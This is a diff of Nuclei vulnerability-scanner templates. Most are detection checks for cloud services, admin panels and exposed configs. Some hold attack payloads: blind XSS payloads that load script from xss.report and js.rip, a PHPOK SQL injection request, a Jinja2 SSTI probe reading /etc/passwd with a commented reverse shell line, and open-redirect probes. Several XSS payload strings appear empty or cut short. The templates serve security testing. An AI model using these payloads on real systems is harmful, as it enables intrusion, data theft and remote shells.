'x-cache: error from cloudfront')" diff --git a/nuclei-templates/Other/aws-cloudfront-service.yaml b/nuclei-templates/Other/aws-cloudfront-service.yaml deleted file mode 100644 index 26ab05d613..0000000000 --- a/nuclei-templates/Other/aws-cloudfront-service.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: aws-cloudfront-service - -info: - name: AWS Cloudfront service detection - author: jiheon-dev - severity: info - description: Detect websites using AWS cloudfront service - tags: aws,tech,service - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers: - - type: dsl - condition: or - dsl: - - "contains(tolower(all_headers), 'x-cache: hit from cloudfront')" - - "contains(tolower(all_headers), 'x-cache: refreshhit from cloudfront')" - - "contains(tolower(all_headers), 'x-cache: miss from cloudfront')" - - "contains(tolower(all_headers), 'x-cache: error from cloudfront')" diff --git a/nuclei-templates/Other/aws-cognito-638.yaml b/nuclei-templates/Other/aws-cognito.yaml similarity index 100% rename from nuclei-templates/Other/aws-cognito-638.yaml rename to nuclei-templates/Other/aws-cognito.yaml diff --git a/nuclei-templates/Other/aws-ecs-container-agent-tasks-640.yaml b/nuclei-templates/Other/aws-ecs-container-agent-tasks-640.yaml deleted file mode 100644 index 84ffe70e43..0000000000 --- a/nuclei-templates/Other/aws-ecs-container-agent-tasks-640.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: aws-ecs-container-agent-tasks - -info: - name: aws-ecs-container-agent-tasks - author: dogasantos - severity: info - tags: aws,docker,ec2 - description: Aws container metadata content - reference: https://docs.aws.amazon.com/en_us/elasticbeanstalk/latest/dg/create_deploy_docker_ecstutorial.html#create_deploy_docker_ecstutorial_connect_inspect - -requests: - - method: GET - path: - - "{{BaseURL}}/v1/metadata" - - "{{BaseURL}}/v1/tasks" - - matchers-condition: and - matchers: - - type: word - words: - - "arn:aws:ecs" - - - type: status - status: - - 200 \ No newline at end of file diff --git a/nuclei-templates/Other/aws-ecs-container-agent-tasks-641.yaml b/nuclei-templates/Other/aws-ecs-container-agent-tasks-641.yaml new file mode 100644 index 0000000000..9d2912a610 --- /dev/null +++ b/nuclei-templates/Other/aws-ecs-container-agent-tasks-641.yaml @@ -0,0 +1,26 @@ +id: aws-ecs-container-agent-tasks + +info: + name: aws-ecs-container-agent-tasks + author: dogasantos + severity: info + description: Aws container metadata content + reference: + - https://docs.aws.amazon.com/en_us/elasticbeanstalk/latest/dg/create_deploy_docker_ecstutorial.html#create_deploy_docker_ecstutorial_connect_inspect + tags: aws,docker,ec2 + +requests: + - method: GET + path: + - "{{BaseURL}}/v1/metadata" + - "{{BaseURL}}/v1/tasks" + + matchers-condition: and + matchers: + - type: word + words: + - "arn:aws:ecs" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/nuclei-templates/Other/aws-object-listing-645.yaml b/nuclei-templates/Other/aws-object-listing-645.yaml index 53d6e67684..2748d21094 100644 --- a/nuclei-templates/Other/aws-object-listing-645.yaml +++ b/nuclei-templates/Other/aws-object-listing-645.yaml @@ -4,8 +4,7 @@ info: name: AWS bucket with Object listing author: pdteam severity: low - reference: - - https://mikey96.medium.com/cloud-based-storage-misconfigurations-critical-bounties-361647f78a29 + reference: https://mikey96.medium.com/cloud-based-storage-misconfigurations-critical-bounties-361647f78a29 tags: aws,misconfig,bucket requests: diff --git a/nuclei-templates/Other/aws-opensearch-login-649.yaml b/nuclei-templates/Other/aws-opensearch-login-649.yaml deleted file mode 100644 index 57a2128475..0000000000 --- a/nuclei-templates/Other/aws-opensearch-login-649.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: aws-opensearch-login - -info: - name: AWS OpenSearch Login - Detect - author: Higor Melgaço (eremit4) - severity: info - description: AWS OpenSearch login page was detected. - reference: - - https://aws.amazon.com/pt/blogs/opensource/introducing-opensearch/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cwe-id: CWE-200 - cpe: cpe:2.3:a:amazon:opensearch:*:*:*:*:maven:*:*:* - metadata: - max-request: 1 - product: opensearch - vendor: amazon - tags: panel,opensearch,aws,amazon - -http: - - method: GET - path: - - '{{BaseURL}}/_dashboards/app/login' - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - "Please login to OpenSearch Dashboards" -# digest: 4a0a00473045022100a545da3e16df9c30198e45761bd50b51f2e497bb38cb56da3c83608801fefbc8022045e5554e77ebb6d3bc952b7a79db1fdfb19d0bef9f53c9c228b4fc66566f5ac6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/aws-opensearch-login.yaml b/nuclei-templates/Other/aws-opensearch-login.yaml new file mode 100644 index 0000000000..5e1bc2b728 --- /dev/null +++ b/nuclei-templates/Other/aws-opensearch-login.yaml @@ -0,0 +1,21 @@ +id: aws-opensearch-login +info: + name: AWS OpenSearch Default Login + author: Higor Melgaço (eremit4) + severity: medium + description: Searches for the AWS OpenSearch login page + reference: + - https://aws.amazon.com/pt/blogs/opensource/introducing-opensearch/ + tags: panel,opensearch,aws +requests: + - method: GET + path: + - '{{BaseURL}}/_dashboards/app/login' + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "Please login to OpenSearch Dashboards" diff --git a/nuclei-templates/Other/aws-redirect-651.yaml b/nuclei-templates/Other/aws-redirect-651.yaml deleted file mode 100644 index e337d182fd..0000000000 --- a/nuclei-templates/Other/aws-redirect-651.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: aws-redirect - -info: - name: Subdomain takeover AWS S3 - author: manikanta a.k.a @secureitmania - severity: info - reference: - - https://link.medium.com/fgXKJHR9P7 - tags: aws,takeover - -requests: - - method: GET - path: - - '{{BaseURL}}' - - redirects: false - matchers-condition: and - matchers: - - type: status - status: - - 307 - - type: word - words: - - 'Location: https://aws.amazon.com/s3/' - part: header diff --git a/nuclei-templates/Other/aws-redirect.yaml b/nuclei-templates/Other/aws-redirect.yaml new file mode 100644 index 0000000000..010dbbfeca --- /dev/null +++ b/nuclei-templates/Other/aws-redirect.yaml @@ -0,0 +1,24 @@ +id: aws-redirect + +info: + name: Subdomain takeover AWS S3 + author: manikanta a.k.a @secureitmania + severity: info + reference: https://link.medium.com/fgXKJHR9P7 + tags: aws + +requests: + - method: GET + path: + - '{{BaseURL}}' + + redirects: false + matchers-condition: and + matchers: + - type: status + status: + - 307 + - type: word + words: + - 'Location: https://aws.amazon.com/s3/' + part: header diff --git a/nuclei-templates/Other/awstats-config-656.yaml b/nuclei-templates/Other/awstats-config-656.yaml new file mode 100644 index 0000000000..8509655870 --- /dev/null +++ b/nuclei-templates/Other/awstats-config-656.yaml @@ -0,0 +1,26 @@ +id: awstats-config + +info: + name: AWStats config + author: sheikhrishad + severity: info + tags: config,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/awstats/" + - "{{BaseURL}}/awstats.conf" + + matchers: + - type: word + words: + - "AWSTATS CONFIGURE" + - "MAIN SETUP SECTION" + condition: and + + - type: word + words: + - "Index of /awstats" + - "Parent Directory" + condition: and \ No newline at end of file diff --git a/nuclei-templates/Other/awstats-config.yaml b/nuclei-templates/Other/awstats-config.yaml deleted file mode 100644 index 9a4cb3cb84..0000000000 --- a/nuclei-templates/Other/awstats-config.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: awstats-config - -info: - name: AWStats config - author: sheikhrishad - severity: info - tags: config,exposure,awstats - -requests: - - method: GET - path: - - "{{BaseURL}}/awstats/" - - "{{BaseURL}}/awstats.conf" - - matchers: - - type: word - words: - - "AWSTATS CONFIGURE" - - "MAIN SETUP SECTION" - condition: and - - - type: word - words: - - "Index of /awstats" - - "Parent Directory" - condition: and \ No newline at end of file diff --git a/nuclei-templates/Other/awstats-script-657.yaml b/nuclei-templates/Other/awstats-script-657.yaml new file mode 100644 index 0000000000..3631c6a328 --- /dev/null +++ b/nuclei-templates/Other/awstats-script-657.yaml @@ -0,0 +1,29 @@ +id: awstats-script + +info: + name: AWStats script + author: sheikhrishad + severity: info + tags: config,exposure,awstats + +requests: + - method: GET + path: + - "{{BaseURL}}/awstats.pl" + - "{{BaseURL}}/logs/awstats.pl" + - "{{BaseURL}}/webstats/awstats.pl" + + matchers-condition: and + matchers: + - type: word + words: + - "Do not remove this line" + + - type: word + part: header + words: + - "application/x-perl" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/nuclei-templates/Other/awstats-script.yaml b/nuclei-templates/Other/awstats-script.yaml deleted file mode 100644 index 9a81b722f3..0000000000 --- a/nuclei-templates/Other/awstats-script.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: awstats-script - -info: - name: AWStats script - author: sheikhrishad - severity: info - tags: config,exposure - -requests: - - method: GET - path: - - "{{BaseURL}}/awstats.pl" - - "{{BaseURL}}/logs/awstats.pl" - - "{{BaseURL}}/webstats/awstats.pl" - - matchers-condition: and - matchers: - - type: word - words: - - "Do not remove this line" - - - type: word - words: - - "application/x-perl" - part: header - - - type: status - status: - - 200 \ No newline at end of file diff --git a/nuclei-templates/Other/axigen-webadmin-660.yaml b/nuclei-templates/Other/axigen-webadmin-660.yaml index 0e54704559..515f319cbe 100644 --- a/nuclei-templates/Other/axigen-webadmin-660.yaml +++ b/nuclei-templates/Other/axigen-webadmin-660.yaml @@ -7,14 +7,11 @@ info: description: An Axigen Web Admin panel was discovered. reference: - https://www.axigen.com/ - metadata: - shodan-query: 'http.title:"Axigen WebAdmin"' - tags: axigen,panel classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cve-id: cwe-id: CWE-200 + metadata: + shodan-query: http.title:"Axigen WebAdmin" + tags: axigen,panel requests: - method: GET diff --git a/nuclei-templates/Other/axigen-webmail-664.yaml b/nuclei-templates/Other/axigen-webmail-664.yaml index 0b61e4d8bd..859ced9706 100644 --- a/nuclei-templates/Other/axigen-webmail-664.yaml +++ b/nuclei-templates/Other/axigen-webmail-664.yaml @@ -1,16 +1,11 @@ id: axigen-webmail info: - name: Axigen WebMail PanelDetection - author: dhiyaneshDk,idealphase + name: Axigen WebMail + author: dhiyaneshDk severity: info - description: An Axigen webmail panel was discovered. - reference: - - https://www.axigen.com/ - classification: - cwe-id: CWE-200 metadata: - shodan-query: http.title:"Axigen WebMail" + shodan-query: 'http.title:"Axigen WebMail"' tags: axigen,panel requests: @@ -20,21 +15,10 @@ requests: matchers-condition: and matchers: - - type: regex - regex: - - '(?i)(Axigen WebMail)' - - 'Axigen Standard Webmail - (.*)' - condition: or + - type: word + words: + - 'Axigen WebMail' - type: status status: - 200 - - extractors: - - type: regex - group: 1 - part: body - regex: - - '" - script_payload_2: "\"><41707" - script_payload_3: "" - script_payload_4: "" - script_payload_5: "" - script_payload_6: "" - script_payload_7: "\u0022\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e" - script_payload_8: "%3Cdiv%20id%3D%22load%22%3E%3C%2Fdiv%3E%3Cscript%3Evar%20i%20%3D%20document.createElement%28%27iframe%27%29%3B%20i.style.display%20%3D%20%27none%27%3B%20i.onload%20%3D%20function%28%29%20%7B%20i.contentWindow.location.href%20%3D%20%27%2F%2Fjs%2Erip%2F1wqkhxuglq%27%3B%20%7D%3B%20document.getElementById%28%27load%27%29.appendChild%28i%29%3B%3C%2Fscript%3E" - -http: - - method: GET - path: - - "{{BaseURL}}" - - payloads: - blind: - - "{{script_payload_1}}" - - "{{script_payload_2}}" - - "{{script_payload_3}}" - - "{{script_payload_4}}" - - "{{script_payload_5}}" - - "{{script_payload_6}}" - - "{{script_payload_7}}" - - "{{script_payload_8}}" - - fuzzing: - - part: query - type: postfix - mode: single - fuzz: - - "{{blind}}" - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - "{{script_payload_1}}" - - "{{script_payload_2}}" - - "{{script_payload_3}}" - - "{{script_payload_4}}" - - "{{script_payload_5}}" - - "{{script_payload_6}}" - - "{{script_payload_7}}" - - "{{script_payload_8}}" - - type: word - part: header - words: - - "text/html" diff --git a/nuclei-templates/Other/blind-xss.yaml b/nuclei-templates/Other/blind-xss.yaml new file mode 100644 index 0000000000..3f6bcba7bb --- /dev/null +++ b/nuclei-templates/Other/blind-xss.yaml @@ -0,0 +1,30 @@ +id: blind-xss + +info: + name: Blind XSS + author: shelled + severity: medium + description: This template will spray blind XSS payloads into URLs. Use xss.report to check if the payload fired. + tags: xss,blind,generic + +requests: + - raw: + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + User-Agent: {{injection}} + + + payloads: + injection: + - '">' + - '">' + - 'javascript:eval("var a=document.createElement(\"script\");a.src=\"//xss.report/s/shelled\";document.body.appendChild(a)")' + - '">' + - '">

    ' diff --git a/nuclei-templates/Other/phpcollab-detect.yaml b/nuclei-templates/Other/phpcollab-detect.yaml deleted file mode 100644 index 68b8cf104c..0000000000 --- a/nuclei-templates/Other/phpcollab-detect.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: phpcollab-detect -info: - name: PhpCollab detect - author: pikpikcu - severity: info - tags: tech,phpcollab -requests: - - method: GET - path: - - "{{BaseURL}}/general/login.php" - matchers: - - type: word - part: body - words: - - 'PhpCollab' - extractors: - - type: regex - part: body - group: 1 - regex: - - '' diff --git a/nuclei-templates/Other/phpinfo-9518.yaml b/nuclei-templates/Other/phpinfo-9518.yaml new file mode 100644 index 0000000000..eb50638471 --- /dev/null +++ b/nuclei-templates/Other/phpinfo-9518.yaml @@ -0,0 +1,42 @@ +id: phpinfo-files +info: + name: phpinfo Disclosure + author: pdteam & daffainfo & meme-lord + severity: low + tags: config,exposure +requests: + - method: GET + path: + - "{{BaseURL}}/php.php" + - "{{BaseURL}}/phpinfo.php" + - "{{BaseURL}}/info.php" + - "{{BaseURL}}/infophp.php" + - "{{BaseURL}}/php_info.php" + - "{{BaseURL}}/test.php" + - "{{BaseURL}}/i.php" + - "{{BaseURL}}/asdf.php" + - "{{BaseURL}}/pinfo.php" + - "{{BaseURL}}/phpversion.php" + - "{{BaseURL}}/time.php" + - "{{BaseURL}}/index.php" + - "{{BaseURL}}/temp.php" + - "{{BaseURL}}/old_phpinfo.php" + - "{{BaseURL}}/infos.php" + - "{{BaseURL}}/linusadmin-phpinfo.php" + - "{{BaseURL}}/php-info.php" + matchers-condition: and + matchers: + - type: word + words: + - "PHP Extension" + - "PHP Version" + condition: and + - type: status + status: + - 200 + extractors: + - type: regex + part: body + group: 1 + regex: + - '>PHP Version <\/td>([0-9.]+)' diff --git a/nuclei-templates/Other/phpinfo-9521.yaml b/nuclei-templates/Other/phpinfo-9521.yaml deleted file mode 100644 index fab7a57cdf..0000000000 --- a/nuclei-templates/Other/phpinfo-9521.yaml +++ /dev/null @@ -1,49 +0,0 @@ -id: phpinfo-files -info: - name: phpinfo Disclosure - author: pdteam,daffainfo,meme-lord,dhiyaneshDK - description: | - A "PHP Info" page was found. The output of the phpinfo() command can reveal detailed PHP environment information. - remediation: | - Remove PHP Info pages from publicly accessible sites, or restrict access to authorized users only. - severity: low - tags: config,exposure,phpinfo -requests: - - method: GET - path: - - "{{BaseURL}}/php.php" - - "{{BaseURL}}/phpinfo.php" - - "{{BaseURL}}/info.php" - - "{{BaseURL}}/infophp.php" - - "{{BaseURL}}/php_info.php" - - "{{BaseURL}}/test.php" - - "{{BaseURL}}/i.php" - - "{{BaseURL}}/asdf.php" - - "{{BaseURL}}/pinfo.php" - - "{{BaseURL}}/phpversion.php" - - "{{BaseURL}}/time.php" - - "{{BaseURL}}/index.php" - - "{{BaseURL}}/temp.php" - - "{{BaseURL}}/old_phpinfo.php" - - "{{BaseURL}}/infos.php" - - "{{BaseURL}}/linusadmin-phpinfo.php" - - "{{BaseURL}}/php-info.php" - - "{{BaseURL}}/dashboard/phpinfo.php" - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - "PHP Extension" - - "PHP Version" - condition: and - - type: status - status: - - 200 - extractors: - - type: regex - part: body - group: 1 - regex: - - '>PHP Version <\/td>([0-9.]+)' diff --git a/nuclei-templates/Other/phpmyadmin-misconfiguration.yaml b/nuclei-templates/Other/phpmyadmin-misconfiguration.yaml new file mode 100644 index 0000000000..f17b9f7852 --- /dev/null +++ b/nuclei-templates/Other/phpmyadmin-misconfiguration.yaml @@ -0,0 +1,24 @@ +id: phpmyadmin-misconfiguration +info: + name: Sensitive data exposure + author: pussycat0x + severity: high + description: Unauthenticated phpmyadmin leads to exposure of sensitive information + reference: https://www.exploit-db.com/ghdb/6997 + tags: phpmyadmin,misconfig +requests: + - method: GET + path: + - "{{BaseURL}}/phpmyadmin/index.php?db=information_schema" + - "{{BaseURL}}/phpMyAdmin/index.php?db=information_schema" + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + words: + - "var db = 'information_schema';" + - "var opendb_url = 'db_structure.php';" + condition: and + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/phpmyadmin-panel-9525.yaml b/nuclei-templates/Other/phpmyadmin-panel-9525.yaml new file mode 100644 index 0000000000..ceac9e43d5 --- /dev/null +++ b/nuclei-templates/Other/phpmyadmin-panel-9525.yaml @@ -0,0 +1,30 @@ +id: phpmyadmin-panel +info: + name: phpMyAdmin Panel + author: pdteam + severity: info + tags: panel +requests: + - method: GET + path: + - "{{BaseURL}}/phpmyadmin/" + - "{{BaseURL}}/admin//phpmyadmin/" + - "{{BaseURL}}/_phpmyadmin/" + - "{{BaseURL}}/administrator/components/com_joommyadmin/phpmyadmin/" + - "{{BaseURL}}/apache-default/phpmyadmin/" + - "{{BaseURL}}/blog/phpmyadmin/" + - "{{BaseURL}}/forum/phpmyadmin/" + - "{{BaseURL}}/php/phpmyadmin/" + - "{{BaseURL}}/typo3/phpmyadmin/" + - "{{BaseURL}}/web/phpmyadmin/" + - "{{BaseURL}}/xampp/phpmyadmin/" + matchers: + - type: word + words: + - "phpMyAdmin" + extractors: + - type: regex + part: body + group: 1 + regex: + - 'v=([a-z0-9-._]+)' diff --git a/nuclei-templates/Other/phpmyadmin-panel-9528.yaml b/nuclei-templates/Other/phpmyadmin-panel-9528.yaml deleted file mode 100644 index 98b868052e..0000000000 --- a/nuclei-templates/Other/phpmyadmin-panel-9528.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: phpmyadmin-panel -info: - name: phpMyAdmin Panel - author: bauthard - severity: info -requests: - - method: GET - path: - - "{{BaseURL}}/phpmyadmin/" - - "{{BaseURL}}/admin//phpmyadmin/" - - "{{BaseURL}}/_phpmyadmin/" - - "{{BaseURL}}/administrator/components/com_joommyadmin/phpmyadmin/" - - "{{BaseURL}}/apache-default/phpmyadmin/" - - "{{BaseURL}}/blog/phpmyadmin/" - - "{{BaseURL}}/forum/phpmyadmin/" - - "{{BaseURL}}/php/phpmyadmin/" - - "{{BaseURL}}/typo3/phpmyadmin/" - - "{{BaseURL}}/web/phpmyadmin/" - - "{{BaseURL}}/xampp/phpmyadmin/" - matchers: - - type: word - words: - - "phpMyAdmin" diff --git a/nuclei-templates/Other/phpmyadmin-sql-9536.yaml b/nuclei-templates/Other/phpmyadmin-sql-9536.yaml deleted file mode 100644 index 36a0f11b76..0000000000 --- a/nuclei-templates/Other/phpmyadmin-sql-9536.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: phpmyadmin-misconfiguration -info: - name: Sensitive data exposure - author: pussycat0x - severity: high - description: Unauthenticated phpmyadmin leads to exposure of sensitive information - reference: https://www.exploit-db.com/ghdb/6997 - tags: phpmyadmin,misconfig -requests: - - method: GET - path: - - "{{BaseURL}}/phpmyadmin/index.php?db=information_schema" - - "{{BaseURL}}/phpMyAdmin/index.php?db=information_schema" - matchers-condition: and - matchers: - - type: word - words: - - "var db = 'information_schema';" - - "var opendb_url = 'db_structure.php';" - condition: and - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/phpok-sqli-9538.yaml b/nuclei-templates/Other/phpok-sqli-9538.yaml deleted file mode 100644 index 5418e8dfc4..0000000000 --- a/nuclei-templates/Other/phpok-sqli-9538.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: phpok-sqli - -info: - name: PHPOK - SQL Injection - author: ritikchaddha - severity: critical - description: PHPOK contains a SQL injection vulnerability via a GET request. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. - reference: - - https://cve.report/software/phpok/phpok - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10 - cwe-id: CWE-89 - metadata: - verified: true - max-request: 1 - fofa-query: app="phpok" - tags: phpok,sqli -variables: - num: "999999999" - -http: - - method: GET - path: - - '{{BaseURL}}/api.php?c=project&f=index&token=1234&id=news&sort=1 and extractvalue(1,concat(0x7e,md5({{num}}))) --+' - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '{{md5({{num}})}}' - -# digest: 4a0a004730450221008706b8e9dfd9f98c14912e506c142d89e37505f8f0983edadfe0f67c3bfc180002207f3eb9b342194f65566cc148964ffe559da9914aa63ed4f3a9578aa52c2f4165:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/phppgadmin-panel-9539.yaml b/nuclei-templates/Other/phppgadmin-panel-9539.yaml new file mode 100644 index 0000000000..4d006e725c --- /dev/null +++ b/nuclei-templates/Other/phppgadmin-panel-9539.yaml @@ -0,0 +1,17 @@ +id: phppgadmin-panel +info: + name: phpPgAdmin Panel + author: Ganofins + severity: info + tags: panel +requests: + - method: GET + path: + - "{{BaseURL}}/phppgadmin/" + matchers: + - type: word + words: + - "phpPgAdmin" + - "browser.php" + - "intro.php" + condition: and diff --git a/nuclei-templates/Other/phppgadmin-panel-9542.yaml b/nuclei-templates/Other/phppgadmin-panel-9542.yaml deleted file mode 100644 index 0c224c5166..0000000000 --- a/nuclei-templates/Other/phppgadmin-panel-9542.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: phppgadmin-panel - -info: - name: phpPgAdmin Panel - author: Ganofins - severity: info - tags: panel,phppgadmin - -requests: - - method: GET - path: - - "{{BaseURL}}/phppgadmin/" - matchers: - - type: word - words: - - "phpPgAdmin" - - "browser.php" - - "intro.php" - condition: and diff --git a/nuclei-templates/Other/phpwiki-lfi-9568.yaml b/nuclei-templates/Other/phpwiki-lfi-9568.yaml index 8d310252a7..2e3543cf58 100644 --- a/nuclei-templates/Other/phpwiki-lfi-9568.yaml +++ b/nuclei-templates/Other/phpwiki-lfi-9568.yaml @@ -1,9 +1,9 @@ id: phpwiki-lfi info: - name: phpwiki 1.5.4 - Cross-Site Scripting/Local File Inclusion + name: phpwiki 1.5.4 - XSS / Local File Inclusion author: 0x_Akoko severity: high - description: phpwiki 1.5.4 is vulnerable to cross-site scripting and local file inclusion, and allows remote unauthenticated attackers to include and return the content of locally stored files via the 'index.php' endpoint. + description: A vulnerability in phpwiki allows remote unauthenticated attackers to include and return the content of locally stored files via the 'index.php' endpoint. reference: - https://www.exploit-db.com/exploits/38027 tags: phpwiki,lfi,xss @@ -19,5 +19,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/08/04 diff --git a/nuclei-templates/Other/pi-hole-detect-9581.yaml b/nuclei-templates/Other/pi-hole-detect-9581.yaml deleted file mode 100644 index 22d1a56dca..0000000000 --- a/nuclei-templates/Other/pi-hole-detect-9581.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: pi-hole-detect - -info: - name: pi-hole detector - author: geeknik - severity: info - tags: tech,pihole - -requests: - - method: GET - path: - - "{{BaseURL}}/admin/index.php" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - "Pi-hole" - - "Web Interface" - - "FTL" - part: body - condition: and diff --git a/nuclei-templates/Other/pi-hole-detect-9582.yaml b/nuclei-templates/Other/pi-hole-detect-9582.yaml new file mode 100644 index 0000000000..246c2319aa --- /dev/null +++ b/nuclei-templates/Other/pi-hole-detect-9582.yaml @@ -0,0 +1,21 @@ +id: pi-hole-detect +info: + name: pi-hole detector + author: geeknik + severity: info +requests: + - method: GET + path: + - "{{BaseURL}}/admin/index.php" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "Pi-hole" + - "Web Interface" + - "FTL" + part: body + condition: and diff --git a/nuclei-templates/Other/pictatic-api-key-9576.yaml b/nuclei-templates/Other/pictatic-api-key.yaml similarity index 100% rename from nuclei-templates/Other/pictatic-api-key-9576.yaml rename to nuclei-templates/Other/pictatic-api-key.yaml diff --git a/nuclei-templates/Other/pieregister-open-redirect-9577.yaml b/nuclei-templates/Other/pieregister-open-redirect-9577.yaml deleted file mode 100644 index 9c51ff20f2..0000000000 --- a/nuclei-templates/Other/pieregister-open-redirect-9577.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: pieregister-open-redirect - -info: - name: Pie Register < 3.7.2.4 - Open Redirect - severity: low - author: 0x_Akoko - description: The plugin passes unvalidated user input to the wp_redirect() function, without validating it, leading to an Open redirect issue. - reference: - - https://wpscan.com/vulnerability/f6efa32f-51df-44b4-bbba-e67ed5785dd4 - - https://wordpress.org/plugins/pie-register/ - tags: wordpress,redirect,wp-plugin,pieregister - -requests: - - method: GET - path: - - "{{BaseURL}}/?piereg_logout_url=true&redirect_to=https://example.com" - - matchers: - - type: regex - part: header - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' diff --git a/nuclei-templates/Other/pieregister-open-redirect.yaml b/nuclei-templates/Other/pieregister-open-redirect.yaml new file mode 100644 index 0000000000..7a8e6baf77 --- /dev/null +++ b/nuclei-templates/Other/pieregister-open-redirect.yaml @@ -0,0 +1,23 @@ +id: pieregister-open-redirect +info: + name: WordPress Pie Register < 3.7.2.4 - Open Redirect + author: 0x_Akoko + severity: low + description: WordPress Pie Register < 3.7.2.4 is susceptible to an open redirect vulnerability because the plugin passes unvalidated user input to the wp_redirect() function. + reference: + - https://wpscan.com/vulnerability/f6efa32f-51df-44b4-bbba-e67ed5785dd4 + - https://wordpress.org/plugins/pie-register/ + classification: + cwe-id: CWE-601 + tags: wordpress,redirect,wp-plugin,pieregister +requests: + - method: GET + path: + - "{{BaseURL}}/?piereg_logout_url=true&redirect_to=https://interact.sh" + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' + +# Enhanced by mp on 2022/04/13 diff --git a/nuclei-templates/Other/pieregister-plugin-open-redirect.yaml b/nuclei-templates/Other/pieregister-plugin-open-redirect.yaml new file mode 100644 index 0000000000..4e7dd0fa9d --- /dev/null +++ b/nuclei-templates/Other/pieregister-plugin-open-redirect.yaml @@ -0,0 +1,16 @@ +id: wptouch-plugin-open-redirect +info: + name: WPTouch Switch Desktop 3.x Open Redirection + author: 0x_Akoko + reference: https://cxsecurity.com/issue/WLB-2020030114 + severity: medium + tags: wp,redirect,wordpress +requests: + - method: GET + path: + - "{{BaseURL}}/?wptouch_switch=desktop&redirect=https://example.com/" + matchers: + - type: regex + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + part: header diff --git a/nuclei-templates/Other/pikpikcussti.yaml b/nuclei-templates/Other/pikpikcussti.yaml deleted file mode 100644 index 750fb630a3..0000000000 --- a/nuclei-templates/Other/pikpikcussti.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: ssti - -# from_string function is prone to SSTI where it takes the "source" parameter as a template object and render it and then return it. -# Reading the /etc/passwd -# http://localhost/search/?u={{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }} -# Getting a reverse shell -# http://localhost/search?u={{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }} - -info: - name: Jinja2 2.10 - Command injection from_string function - author: pikpikcu - severity: high - -requests: - - method: GET - path: - - "{{BaseURL}}{{100*285}}" - - "{{BaseURL}}{{''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}" - - "{{BaseURL}}{{url_for.__globals__.__builtins__.open('/etc/passwd').read()}}" - matchers: - - type: regex - regex: - - "28500" - - "root:x:0:0:root:" - part: body diff --git a/nuclei-templates/Other/pingdom-takeover-9585.yaml b/nuclei-templates/Other/pingdom-takeover-9585.yaml deleted file mode 100644 index afaa065b07..0000000000 --- a/nuclei-templates/Other/pingdom-takeover-9585.yaml +++ /dev/null @@ -1,16 +0,0 @@ -id: pingdom-takeover -info: - name: pingdom takeover detection - author: pdteam - severity: high - tags: takeover - reference: https://github.com/EdOverflow/can-i-take-over-xyz -requests: - - method: GET - path: - - "{{BaseURL}}" - matchers: - - type: word - words: - - Public Report Not Activated - - This public report page has not been activated by the user diff --git a/nuclei-templates/Other/pingdom-takeover-9587.yaml b/nuclei-templates/Other/pingdom-takeover-9587.yaml new file mode 100644 index 0000000000..fcc211e1b0 --- /dev/null +++ b/nuclei-templates/Other/pingdom-takeover-9587.yaml @@ -0,0 +1,19 @@ +id: pingdom-takeover + +info: + name: pingdom takeover detection + author: pdteam + severity: high + tags: takeover + reference: https://github.com/EdOverflow/can-i-take-over-xyz + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: word + words: + - Public Report Not Activated + - This public report page has not been activated by the user \ No newline at end of file diff --git a/nuclei-templates/Other/pinpoint-unauth-9588.yaml b/nuclei-templates/Other/pinpoint-unauth-9588.yaml deleted file mode 100644 index 566f2dd17c..0000000000 --- a/nuclei-templates/Other/pinpoint-unauth-9588.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: pinpoint-unauth - -info: - name: PinPoint Unauth - author: 